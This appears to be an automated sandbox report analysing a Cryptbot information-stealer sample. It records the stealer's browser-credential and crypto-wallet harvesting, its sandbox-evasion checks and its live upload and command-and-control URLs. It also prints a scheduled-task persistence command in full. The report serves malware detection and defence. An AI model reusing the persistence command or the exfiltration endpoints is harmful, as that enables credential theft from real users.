Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: fulvjkhybveqgvrtqgwm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: fulvjkhybveqgvrtqgwm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: fulvjkhybveqgvrtqgwm.dll	Jump to behavior

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: lkOawAWJRO.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: lkOawAWJRO.exe

Static file information: File size 6840320 > 1048576

Source: lkOawAWJRO.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x48ac00
Source: lkOawAWJRO.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x17f600

Source: lkOawAWJRO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_006C8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_006C8230

Source: lkOawAWJRO.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: FuLvJKHyBveQGVRTqGwm.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006CA499 push es; iretd	5_2_006CA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2C0C30 push eax; mov dword ptr [esp], edi	5_2_6C2C0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C28ED10 push eax; mov dword ptr [esp], ebx	5_2_6C28EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C264E31 push eax; mov dword ptr [esp], ebx	5_2_6C264E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C258E7A push edx; mov dword ptr [esp], ebx	5_2_6C258E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25A947 push eax; mov dword ptr [esp], ebx	5_2_6C25A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C260AA2 push eax; mov dword ptr [esp], ebx	5_2_6C260AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C278AA0 push eax; mov dword ptr [esp], ebx	5_2_6C27909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C262AAC push edx; mov dword ptr [esp], ebx	5_2_6C262AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C28EAB0 push eax; mov dword ptr [esp], ebx	5_2_6C28EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C292BF0 push eax; mov dword ptr [esp], ebx	5_2_6C292F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C292BF0 push edx; mov dword ptr [esp], ebx	5_2_6C292F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C258435 push edx; mov dword ptr [esp], ebx	5_2_6C258449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C278460 push eax; mov dword ptr [esp], ebx	5_2_6C278A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25048B push eax; mov dword ptr [esp], ebx	5_2_6C2504A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2504E0 push eax; mov dword ptr [esp], ebx	5_2_6C2506DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C231CFA push eax; mov dword ptr [esp], ebx	5_2_6C2E6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C231CFA push eax; mov dword ptr [esp], ebx	5_2_6C2E6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25A5A7 push eax; mov dword ptr [esp], ebx	5_2_6C25A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C292620 push eax; mov dword ptr [esp], ebx	5_2_6C292954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C292620 push edx; mov dword ptr [esp], ebx	5_2_6C292973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2506A6 push eax; mov dword ptr [esp], ebx	5_2_6C2506DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2506A2 push eax; mov dword ptr [esp], ebx	5_2_6C2506DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2686A1 push 890005EAh; ret	5_2_6C2686A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2A06B0 push eax; mov dword ptr [esp], ebx	5_2_6C2A0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2566F3 push edx; mov dword ptr [esp], ebx	5_2_6C256707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C2506FD push eax; mov dword ptr [esp], ebx	5_2_6C2506DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25070E push eax; mov dword ptr [esp], ebx	5_2_6C2506DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C25A777 push eax; mov dword ptr [esp], ebx	5_2_6C25A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C260042 push eax; mov dword ptr [esp], ebx	5_2_6C260056
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C22E0D0 push eax; mov dword ptr [esp], ebx	5_2_6C2E6AF6

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File created: C:\Users\user\AppData\Local\Temp\FuLvJKHyBveQGVRTqGwm.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-160334

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-160335

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 859

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\lkOawAWJRO.exe TID: 5512	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6224	Thread sleep count: 859 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6224	Thread sleep time: -85900s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: lkOawAWJRO.exe	Binary or memory string: VMware
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: lkOawAWJRO.exe, 00000000.00000003.2159936721.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000002.2654737502.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148345397.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2652711802.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000002.2654737502.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: lkOawAWJRO.exe, 00000000.00000003.2200841884.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_006C8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_006C8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_006C116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_006C1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_006C11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006C13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_006C13C9

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C2984D0 cpuid

5_2_6C2984D0

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\lkOawAWJRO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6c210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2632067693.0000000004106000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lkOawAWJRO.exe PID: 5648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 1048, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: lkOawAWJRO.exe PID: 5648, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: lkOawAWJRO.exe	String found in binary or memory: Electrum
Source: lkOawAWJRO.exe	String found in binary or memory: \ElectronCash\wallets
Source: lkOawAWJRO.exe	String found in binary or memory: com.liberty.jaxx
Source: lkOawAWJRO.exe	String found in binary or memory: \Exodus\backup
Source: lkOawAWJRO.exe	String found in binary or memory: exodus
Source: lkOawAWJRO.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\lkOawAWJRO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: lkOawAWJRO.exe PID: 5648, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: lkOawAWJRO.exe PID: 5648, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lkOawAWJRO.exe	34%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://sevtvr17pt.top/v1/upload.php	1%	Virustotal		Browse
http://sevtvr17pt.top:80/v1/upload.php	1%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://keruzam.com/update.php?compName=	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtvr17pt.top	80.66.81.78	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
analforeverlovyu.top	true	URL Reputation: safe	unknown
+sevtvr17pt.top	true		unknown
sevtvr17pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://sevtvr17pt.top/	lkOawAWJRO.exe, 00000000.00000003.2159936721.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148278787.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	FuLvJKHyBveQGVRTqGwm.dll.0.dr	false	URL Reputation: safe	unknown
https://keruzam.com/update.php?compName	lkOawAWJRO.exe	false		unknown
http://sevtvr17pt.top/v1/upload.php	lkOawAWJRO.exe, 00000000.00000003.2148278787.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148345397.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://duckduckgo.com/ac/?q=	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://sevtvr17pt.top:80/v1/upload.php	lkOawAWJRO.exe, 00000000.00000003.2148278787.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2148345397.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, lkOawAWJRO.exe, 00000000.00000003.2159936721.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://keruzam.com/update.php?compName=	lkOawAWJRO.exe, 00000000.00000003.2653416501.000000006A364000.00000002.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	lkOawAWJRO.exe, 00000000.00000003.2200460676.00000000018BB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
80.66.81.78	sevtvr17pt.top	Russian Federation		202984	TEAM-HOSTASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532112
Start date and time:	2024-10-12 12:29:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
